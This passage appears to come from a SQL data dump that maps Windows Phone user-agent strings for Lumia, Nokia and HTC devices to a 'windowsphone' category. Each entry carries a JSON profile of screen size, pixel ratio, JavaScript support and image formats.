Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 535) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 540 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 LTE Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 XL Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 XL LTE Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 640 XL LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 650 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 950 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 950 XL Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 950 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Microsoft; Lumia 950) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 1520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 635) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 730 Dual SIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 735) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 10.0; Android 6.*; Nokia; Lumia 930) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; HTC; HTC6995LVW) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":403,\"screenHeight\":739,\"pixelRatio\":2.68,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 430 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 435 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 435) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 532 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 532) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 532; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 540 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 LTE Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 LTE) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 LTE; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 LTE; Vodafone) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 XL Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 XL LTE) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 640 XL) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; 909) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 1320) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 1520) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 520) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 520) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 520; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 520; Vodafone) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 521) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530 Dual SIM) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 530; Vodafone) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 620) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 620) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 625) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 625) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 625; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 630 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 630) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 630) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 630; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 630; Vodafone) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 635) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 635) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 635; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 635; Vodafone) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 720) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 720; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 730 Dual SIM) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 735) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 735; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 820) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 822) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 830) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 920) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 920) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 920; Orange) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; 